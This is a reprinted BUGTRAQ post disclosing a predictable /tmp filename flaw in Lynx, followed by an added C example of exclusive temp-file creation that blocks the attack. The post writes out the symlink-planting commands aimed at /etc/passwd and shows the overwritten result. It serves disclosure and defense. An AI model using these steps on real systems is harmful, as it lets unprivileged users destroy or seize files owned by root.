---

Security hole in Lynx

Juan Diego Bolanos posted to BUGTRAQ:

Subject: Lynx /tmp problem

Hello....

I have found a bug in all versions of Lynx, except the latest stable
release...

Lynx creates temporary files in /tmp in this way....


L[num proc]-xTMP.html

where

[num proc] is the proc number in the machine
x is a number from 0 to 9

If I run lynx as any user, for example root, we see this:

earthworm:~$ ps
  PID TTY STAT  TIME COMMAND
   91   1 SW   0:06 (bash)
   94   4 S    0:05 -bash
   95   5 SW   0:06 (bash)
 3867  a3 S    0:00 pppd -detach defaultroute crtscts modem 192.168.2.6:
 3870   3 SW   0:02 (ssh)
 3894   4 T    0:00 lynx
 3898   4 R    0:00 ps

Then the files in /tmp created by lynx will be..

L3894-0TMP.html
L3894-1TMP.html
L3894-2TMP.html
L3894-3TMP.html
L3894-4TMP.html
L3894-5TMP.html
L3894-6TMP.html
L3894-7TMP.html
L3894-8TMP.html
L3894-9TMP.html

If I make a symlink
from all of these files to any file in the system, for example....


earthworm:~$ cd /tmp
earthworm:/tmp$ ln -s /etc/passwd  L3894-0TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-1TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-2TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-3TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-4TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-5TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-6TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-7TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-8TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-9TMP.html

and now root (in this example) tries to download a file, or presses the
backspace key to reach the history list, the file I have linked (in this
case /etc/passwd) will be replaced with it... and now is owned by root...

For example, I got this on my system...

earthworm:/tmp$ cat /etc/passwd

<head>
<title>Lynx History Page</title>
</head>
<body>
<h1>You have reached the History Page</h1>
<h2>Lynx Version 2.8rel2</h2>
<pre><em>You selected:</em>
  <em>0</em>. <tab id=t0><a href="LYNXHIST:0">Internet Firewalls Frequently Asked Questions</a>
<tab to=t0>file://localhost/root/firefaq.html
</pre>
</body>


As you see, the file is lost now...

This bug is Lynx-specific, so all OSes are vulnerable..

Fix: upgrade to the latest Lynx version. I have checked it, and it appears
to use L[proc num]-xTMP.html where x is from 0 to ???...

I hope it is already fixed; creating 100 symlinks is not too hard :)

The Lynx team knows this already.

Bye...


Juan Diego

Lynx’s homepage is http://lynx.browser.org -lt ed
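
The overwrite described in the post happens because a predictable path in a shared directory is opened without checking whether something already sits there. The C code below is an added example, not code from Lynx or from the original post: it shows exclusive creation and mkstemp() refusing a pre-planted link. The names open_temp_excl and symlink_check, the directory template and the file contents are constructed for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Create a temp file at a caller-chosen path. O_EXCL makes the create fail
 * if anything, including a symlink, already sits at that path; O_NOFOLLOW
 * refuses a symlink in the final component. Returns fd, or -1 with errno. */
int open_temp_excl(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Constructed check, confined to a private mkdtemp() directory: a symlink
 * is pre-planted at a Lynx-style name, pointing at a stand-in "victim" file.
 * Returns 0 if the hardened paths refuse it and the victim is untouched. */
int symlink_check(void)
{
    char dir[] = "/tmp/lynxdemoXXXXXX";
    char victim[64], planted[64], tmpl[64], buf[16] = {0};
    if (mkdtemp(dir) == NULL) return 1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(planted, sizeof planted, "%s/L3894-0TMP.html", dir);
    snprintf(tmpl, sizeof tmpl, "%s/LXXXXXX", dir);
    FILE *f = fopen(victim, "w");
    if (f == NULL) return 2;
    fputs("precious", f);
    fclose(f);
    if (symlink(victim, planted) != 0) return 3;

    int fd = open_temp_excl(planted);   /* expected: refused, fd == -1 */
    int refused = (fd == -1);
    if (fd != -1) close(fd);
    int rfd = mkstemp(tmpl);            /* preferred: unpredictable name */
    int fresh = (rfd != -1 && strcmp(tmpl, planted) != 0);
    if (rfd != -1) { close(rfd); unlink(tmpl); }

    f = fopen(victim, "r");
    if (f != NULL) {
        if (fread(buf, 1, 8, f) != 8) buf[0] = '\0';
        fclose(f);
    }
    unlink(planted); unlink(victim); rmdir(dir);
    return (refused && fresh && strcmp(buf, "precious") == 0) ? 0 : 4;
}

int main(void) { return symlink_check(); }
```

A program that gets a refusal from the exclusive open should pick another name or abort, not retry with weaker flags.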